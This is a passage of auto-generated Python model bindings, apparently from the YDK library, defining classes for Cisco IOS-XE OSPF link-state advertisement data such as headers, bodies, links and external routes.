('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class UnknownSubTlv(Entity): """ OSPFv2 Unknown sub TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): """ List OSPF area scope LSA databases .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader 